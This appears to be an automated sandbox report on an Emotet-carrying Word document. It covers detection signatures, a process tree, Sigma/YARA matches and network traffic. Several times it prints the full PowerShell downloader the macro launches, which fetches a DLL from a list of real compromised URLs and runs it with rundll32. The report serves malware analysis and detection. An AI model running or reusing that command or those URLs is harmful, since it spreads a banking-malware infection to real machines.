Windows Analysis Report: 704.doc

Overview

General Information

Sample Name: 704.doc
Analysis ID: 526268
MD5: 40f85d07da2533d576b1f2d7c043a2da
SHA1: 60b84d70a6511483c6de131fb62e30a99edff5c4
SHA256: d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Yara detected Emotet Downloader
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Machine Learning detection for sample
Obfuscated command line found
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 6924 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • cmd.exe (PID: 4128 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6312 cmdline: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • rundll32.exe (PID: 1376 cmdline: "C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMP
Rule: SUSP_VBA_FileSystem_Access
Description: Detects suspicious VBA that writes to disk and is activated on document open
Author: Florian Roth
Strings:
  • 0x9be4:$s1: \Common Files\Microsoft Shared\
  • 0x9f3c:$s1: \Common Files\Microsoft Shared\
  • 0x41e1:$s2: Scripting.FileSystemObject
  • 0x5318:$a1: Document_Open
  • 0x9203:$a1: Document_Open
  • 0xa612:$a1: Document_Open
  • 0xba62:$a1: Document_Open

Source: C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt
Rule: JoeSecurity_EmotetDownloader
Description: Yara detected Emotet Downloader
Author: Joe Security

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6924, ProcessCommandLine: "C:\Windows\System32\cmd.exe" 
/c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 4128
    Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
    Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6924, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell 
$dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 4128
    Sigma detected: Non Interactive PowerShell
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell 
$dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4128, ProcessCommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebReques
    Sigma detected: T1086 PowerShell Execution
    Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132820573608402300.6312.DefaultAppDomain.powershell

    Jbx Signature Overview

    AV Detection:

    Antivirus detection for URL or domain
    Source: http://ckfoods.net/wp-admin/wPInm2rgMu/; Avira URL Cloud: Label: malware
    Source: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/; Avira URL Cloud: Label: malware
    Source: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/; Avira URL Cloud: Label: malware
    Machine Learning detection for sample
    Source: 704.doc; Joe Sandbox ML: detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll

    Software Vulnerabilities:

    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Process created: C:\Windows\SysWOW64\cmd.exe
    Source: global traffic; DNS query: name: primtalent.com
    Source: global traffic; TCP traffic: 192.168.2.4:49754 -> 148.72.96.3:80
    Source: winword.exe; Memory has grown: Private usage: 0MB, later: 76MB
    Source: Joe Sandbox View; ASN Name: HINETDataCommunicationBusinessGroupTW
    Source: Joe Sandbox View; ASN Name: AS-26496-GO-DADDY-COM-LLCUS
    Source: global traffic; HTTP traffic detected:
      GET /wp-admin/9yt1u/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
      Host: primtalent.com
      Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected:
      GET /wordpress/6f0qIQlWPaYDfa/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
      Host: huskysb.com
      Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected:
      GET /cgi-sys/suspendedpage.cgi HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
      Host: huskysb.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Nov 2021 12:23:07 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.dr; String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.dr; String found in binary or memory: http://ckfoods.net/wp-admin/wPInm2rgMu/
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.dr; String found in binary or memory: http://huskysb.com/wordpress/6f0qIQlWPaYDfa/
    Source: powershell.exe, 00000006.00000002.754451635.000000000531E000.00000004.00000001.sdmp; String found in binary or memory: http://huskysb.com4
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.dr; String found in binary or memory: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: powershell.exe, 00000006.00000003.729788789.00000000080F3000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmp; String found in binary or memory: http://primtalent.com
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.dr; String found in binary or memory: http://primtalent.com/wp-admin/9yt1u/
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.dr; String found in binary or memory: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/
    Source: powershell.exe, 00000006.00000002.753910843.0000000005021000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.dr; String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmp; String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/.Split/p
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmp; String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/XnG/.Splitplits/
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmp; String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/deXnG/.Split.Split
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmp; String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/h
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmp; String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/tp
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: powershell.exe, 00000006.00000003.729788789.00000000080F3000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.aadrm.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.aadrm.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.addins.store.office.com/app/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.cortana.ai
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.diagnostics.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.diagnosticssdf.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.microsoftstream.com/api/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.office.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.onedrive.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://apis.live.net/v5.0/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://augloop.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://augloop.office.com/v2
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://autodiscover-s.outlook.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://cdn.entity.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://clients.config.office.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://config.edge.skype.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://config.edge.skype.com/config/v1/Office
